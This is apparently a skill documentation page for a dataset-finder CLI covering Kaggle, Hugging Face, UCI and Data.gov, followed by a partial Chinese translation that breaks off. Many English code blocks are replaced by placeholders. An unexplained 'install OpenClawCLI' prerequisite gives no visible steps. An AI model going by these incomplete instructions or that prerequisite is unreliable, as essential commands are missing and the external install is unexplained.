Dataset Finder
Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation:
CODEBLOCK0
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|
| Search Kaggle | INLINECODE1 |
| Download Kaggle dataset |
python scripts/dataset.py kaggle download "username/dataset-name" |
| Search Hugging Face |
python scripts/dataset.py huggingface search "sentiment" |
| Download HF dataset |
python scripts/dataset.py huggingface download "dataset-name" |
| Search UCI ML |
python scripts/dataset.py uci search "classification" |
| Preview dataset |
python scripts/dataset.py preview dataset.csv |
| Generate data card |
python scripts/dataset.py datacard dataset.csv --output README.md |
| List local datasets |
python scripts/dataset.py list |
Core Features
1. Multi-Repository Search
Search across multiple data repositories from a single interface.
Supported Sources:
- - Kaggle - ML competitions and community datasets
- Hugging Face - NLP, vision, and audio datasets
- UCI ML Repository - Classic ML datasets
- Data.gov - US government open data
- Local - Manage downloaded datasets
2. Dataset Download
Download datasets with automatic format detection.
Supported formats:
- - CSV, TSV
- JSON, JSONL
- Parquet
- Excel (XLSX, XLS)
- ZIP archives
- HDF5
- Feather
3. Dataset Preview
Get quick statistics and insights without loading entire datasets.
Preview features:
- - Shape (rows × columns)
- Column names and types
- Missing value counts
- Basic statistics (mean, std, min, max)
- Memory usage
- Sample rows
4. Data Card Generation
Automatically generate dataset documentation.
Includes:
- - Dataset description
- Schema information
- Statistics summary
- Usage examples
- License information
- Citation details
Repository-Specific Commands
Kaggle
Search and download datasets from Kaggle.
Setup:
- 1. Get Kaggle API credentials from https://www.kaggle.com/settings
- Place
kaggle.json in ~/.kaggle/ (Linux/Mac) or %USERPROFILE%\.kaggle\ (Windows)
CODEBLOCK1
Search options:
- -
--file-type - Filter by file type (csv, json, etc.) - INLINECODE13 - Filter by license type
- INLINECODE14 - Sort by hotness, votes, updated, or relevance
- INLINECODE15 - Limit number of results
Output:
CODEBLOCK2
Hugging Face Datasets
Search and download datasets from Hugging Face Hub.
CODEBLOCK3
Search options:
- -
--task - Filter by task (text-classification, translation, etc.) - INLINECODE17 - Filter by language code
- INLINECODE18 - Include multimodal datasets
- INLINECODE19 - Only benchmark datasets
- INLINECODE20 - Limit results
Output:
CODEBLOCK4
UCI ML Repository
Search and download classic ML datasets.
CODEBLOCK5
Search options:
- -
--task-type - classification, regression, clustering - INLINECODE22 - Minimum number of instances
- INLINECODE23 - Minimum number of features
- INLINECODE24 - tabular, text, image, time-series
Output:
CODEBLOCK6
Data.gov
Search US government open data.
CODEBLOCK7
Search options:
- -
--organization - Filter by publishing organization - INLINECODE26 - Filter by tags (comma-separated)
- INLINECODE27 - Filter by format (csv, json, xml, etc.)
- INLINECODE28 - Limit results
Output:
1. 2020 Census Demographic Data
Organization: census.gov
Format: CSV
Size: 125 MB
Last updated: 2023-01-15
Tags: census, demographics, population
URL: https://catalog.data.gov/dataset/...
Dataset Management
Preview Datasets
Get quick insights without loading entire datasets.
CODEBLOCK9
Output:
CODEBLOCK10
Generate Data Cards
Create standardized dataset documentation.
CODEBLOCK11
Generated data card includes:
- - Dataset description
- File information (size, format, rows, columns)
- Schema (column names, types, descriptions)
- Statistics (distributions, missing values, correlations)
- Sample data
- Usage examples
- License and citation
- Known issues/limitations
Example output (DATACARD.md):
# Dataset Card: Housing Prices
## Dataset Description
This dataset contains housing prices and features for regression analysis.
## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81
## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...
## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)
## Usage
python
import pandas as pd
df = pd.read
csv('housingprices.csv')
CODEBLOCK13
List Local Datasets
Manage downloaded datasets.
CODEBLOCK14
Output:
Local Datasets (5 total, 2.5 GB):
1. zillow/zecon (Kaggle)
Downloaded: 2024-01-15
Size: 1.5 MB
Files: train.csv, test.csv
Location: datasets/kaggle/zillow/zecon/
2. imdb (Hugging Face)
Downloaded: 2024-01-20
Size: 84.1 MB
Splits: train, test, unsupervised
Location: datasets/huggingface/imdb/
3. iris (UCI ML)
Downloaded: 2024-01-18
Size: 4.5 KB
Files: iris.data, iris.names
Location: datasets/uci/iris/
Common Workflows
Machine Learning Project Setup
Find and download datasets for a new ML project.
CODEBLOCK16
NLP Project Dataset Collection
Gather text datasets for NLP tasks.
CODEBLOCK17
Dataset Comparison
Compare multiple datasets for selection.
CODEBLOCK18
Building a Dataset Library
Organize datasets for team use.
CODEBLOCK19
Data Quality Assessment
Assess dataset quality before use.
CODEBLOCK20
Advanced Features
Batch Download
Download multiple datasets at once.
CODEBLOCK21
Dataset Conversion
Convert between formats.
CODEBLOCK22
Dataset Splitting
Split datasets for ML workflows.
CODEBLOCK23
Dataset Merging
Combine multiple datasets.
CODEBLOCK24
Best Practices
Search Strategy
- 1. Start broad - Use general keywords first
- Refine iteratively - Add filters based on results
- Check multiple sources - Different repositories have different strengths
- Review metadata - Check size, format, license before downloading
Download Management
- 1. Check size first - Use search to see dataset size
- Preview before download - When possible, preview samples
- Organize by source - Keep repository structure clear
- Track downloads - Use list command to manage local datasets
Data Quality
- 1. Always preview - Check data before using
- Generate data cards - Document all datasets
- Validate data - Check for missing values, outliers
- Keep metadata - Save original descriptions and licenses
Storage
- 1. Use version control - Track dataset versions
- Compress when possible - Use Parquet or HDF5 for large datasets
- Clean regularly - Remove unused datasets
- Backup important data - Keep copies of critical datasets
Troubleshooting
Installation Issues
"Missing required dependency"
CODEBLOCK25
"Kaggle API credentials not found"
- 1. Go to https://www.kaggle.com/settings
- Click "Create New API Token"
- Save
kaggle.json to:
- Linux/Mac:
~/.kaggle/
- Windows:
%USERPROFILE%\.kaggle\
- 4. Set permissions: INLINECODE32
"Hugging Face authentication required"
CODEBLOCK26
Search Issues
"No results found"
- - Try broader search terms
- Remove restrictive filters
- Check spelling
- Try different repository
"Search timeout"
- - Check internet connection
- Repository may be down temporarily
- Try again in a few minutes
Download Issues
"Download failed"
- - Check internet connection
- Verify dataset still exists
- Check available disk space
- Try downloading specific files
"Permission denied"
- - Some datasets require accepting terms
- May need API credentials
- Check dataset license
"Out of memory"
- - Use streaming for large datasets
- Download in chunks
- Use Parquet instead of CSV
Preview Issues
"Cannot load dataset"
- - Check file format
- Verify file is not corrupted
- Try specifying encoding: INLINECODE33
"Preview too slow"
- - Use smaller sample size
- Preview first N rows only
- Use format-specific tools
Command Reference
CODEBLOCK27
Examples by Use Case
Quick Dataset Search
CODEBLOCK28
Download and Preview
CODEBLOCK29
Multi-Source Search
CODEBLOCK30
Dataset Management
CODEBLOCK31
Support
For issues or questions:
- 1. Check this documentation
- Run INLINECODE34
- Verify API credentials are set
- Check repository-specific documentation
Resources:
- - OpenClawCLI: https://clawhub.ai/
- Kaggle API: https://github.com/Kaggle/kaggle-api
- Hugging Face Datasets: https://huggingface.co/docs/datasets/
- UCI ML Repository: https://archive.ics.uci.edu/ml/
- Data.gov API: https://www.data.gov/developers/apis
数据集查找器
从多个存储库(包括Kaggle、Hugging Face、UCI机器学习存储库和Data.gov)搜索、下载和探索数据集。预览统计数据、生成数据卡片,并管理用于机器学习项目的数据集。
⚠️ 前提条件: 安装 OpenClawCLI(Windows、MacOS)
安装:
bash
标准安装
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
如果遇到权限错误,请使用虚拟环境
python -m venv venv
source venv/bin/activate # 在Windows上:venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
切勿使用 --break-system-packages,因为它可能会损坏系统的Python安装。
快速参考
| 任务 | 命令 |
|---|
| 搜索Kaggle | python scripts/dataset.py kaggle search housing prices |
| 下载Kaggle数据集 |
python scripts/dataset.py kaggle download username/dataset-name |
| 搜索Hugging Face | python scripts/dataset.py huggingface search sentiment |
| 下载HF数据集 | python scripts/dataset.py huggingface download dataset-name |
| 搜索UCI ML | python scripts/dataset.py uci search classification |
| 预览数据集 | python scripts/dataset.py preview dataset.csv |
| 生成数据卡片 | python scripts/dataset.py datacard dataset.csv --output README.md |
| 列出本地数据集 | python scripts/dataset.py list |
核心功能
1. 多存储库搜索
从单一界面跨多个数据存储库进行搜索。
支持的来源:
- - Kaggle - 机器学习竞赛和社区数据集
- Hugging Face - NLP、视觉和音频数据集
- UCI机器学习存储库 - 经典机器学习数据集
- Data.gov - 美国政府开放数据
- 本地 - 管理已下载的数据集
2. 数据集下载
下载数据集并自动检测格式。
支持的格式:
- - CSV、TSV
- JSON、JSONL
- Parquet
- Excel(XLSX、XLS)
- ZIP存档
- HDF5
- Feather
3. 数据集预览
无需加载整个数据集即可获取快速统计信息和见解。
预览功能:
- - 形状(行×列)
- 列名和类型
- 缺失值计数
- 基本统计信息(均值、标准差、最小值、最大值)
- 内存使用情况
- 样本行
4. 数据卡片生成
自动生成数据集文档。
包括:
- - 数据集描述
- 模式信息
- 统计摘要
- 使用示例
- 许可证信息
- 引用详情
特定存储库命令
Kaggle
从Kaggle搜索和下载数据集。
设置:
- 1. 从 https://www.kaggle.com/settings 获取Kaggle API凭据
- 将 kaggle.json 放置在 ~/.kaggle/(Linux/Mac)或 %USERPROFILE%\.kaggle\(Windows)
bash
搜索数据集
python scripts/dataset.py kaggle search house prices
带筛选条件的搜索
python scripts/dataset.py kaggle search NLP --file-type csv --sort-by hotness
下载数据集
python scripts/dataset.py kaggle download zillow/zecon
下载特定文件
python scripts/dataset.py kaggle download username/dataset --file train.csv
列出数据集文件
python scripts/dataset.py kaggle list username/dataset-name
搜索选项:
- - --file-type - 按文件类型筛选(csv、json等)
- --license - 按许可证类型筛选
- --sort-by - 按热度、投票数、更新日期或相关性排序
- --max-results - 限制结果数量
输出:
- 1. 房价 - 高级回归技术
所有者:zillow/zecon
大小:1.5 MB
最后更新:2023-06-15
下载量:150,000+
网址:https://www.kaggle.com/datasets/zillow/zecon
- 2. 房价数据集
所有者:username/housing-data
大小:850 KB
最后更新:2023-08-20
下载量:50,000+
网址:https://www.kaggle.com/datasets/username/housing-data
Hugging Face数据集
从Hugging Face Hub搜索和下载数据集。
bash
搜索数据集
python scripts/dataset.py huggingface search sentiment analysis
带筛选条件的搜索
python scripts/dataset.py huggingface search NLP --task text-classification --language en
下载数据集
python scripts/dataset.py huggingface download imdb
下载特定分割
python scripts/dataset.py huggingface download imdb --split train
下载特定配置
python scripts/dataset.py huggingface download glue --config mrpc
流式传输大型数据集
python scripts/dataset.py huggingface download large-dataset --streaming
搜索选项:
- - --task - 按任务筛选(文本分类、翻译等)
- --language - 按语言代码筛选
- --multimodal - 包含多模态数据集
- --benchmark - 仅基准数据集
- --max-results - 限制结果
输出:
- 1. IMDB电影评论
数据集ID:imdb
任务:情感分类
语言:en
大小:84.1 MB
下载量:1M+
网址:https://huggingface.co/datasets/imdb
- 2. 斯坦福情感树库
数据集ID:sst2
任务:情感分类
语言:en
大小:7.4 MB
下载量:500K+
网址:https://huggingface.co/datasets/sst2
UCI机器学习存储库
搜索和下载经典机器学习数据集。
bash
搜索数据集
python scripts/dataset.py uci search classification
按特征搜索
python scripts/dataset.py uci search regression --min-samples 1000
下载数据集
python scripts/dataset.py uci download iris
下载并包含元数据
python scripts/dataset.py uci download wine-quality --include-metadata
搜索选项:
- - --task-type - 分类、回归、聚类
- --min-samples - 最小实例数
- --min-features - 最小特征数
- --data-type - 表格、文本、图像、时间序列
输出:
- 1. 鸢尾花数据集
ID:iris
任务:分类
样本数:150
特征数:4
类别数:3
缺失值:无
网址:https://archive.ics.uci.edu/ml/datasets/iris
- 2. 葡萄酒质量
ID:wine-quality
任务:分类/回归
样本数:6497
特征数:11
缺失值:无
网址:https://archive.ics.uci.edu/ml/datasets/wine+quality
Data.gov
搜索美国政府开放数据。
bash
搜索数据集
python scripts/dataset.py datagov search census
按组织筛选搜索
python scripts/dataset.py datagov search health --organization cdc.gov
按主题搜索
python scripts/dataset.py datagov search education --tags schools,students
下载数据集
python scripts/dataset.py datagov download dataset-id
搜索选项:
- - --organization - 按发布组织筛选
- --tags - 按标签筛选(逗号分隔)
- --format - 按格式筛选(csv、json、xml等)
- --max-results - 限制结果
输出:
- 1. 2020年人口普查人口统计数据
组织:census.gov
格式:CSV
大小:125 MB
最后更新:2023-01-15
标签:人口普查、人口统计、人口
网址:https://catalog.data.gov/dataset/...
数据集管理
预览数据集
无需加载整个数据集即可获取快速见解。
bash
基本预览
python scripts/dataset.py preview data.csv
详细统计信息
python scripts/dataset.py preview data.csv --detailed
自定义样本大小
python scripts/dataset.py preview data.csv --sample 20
多个文件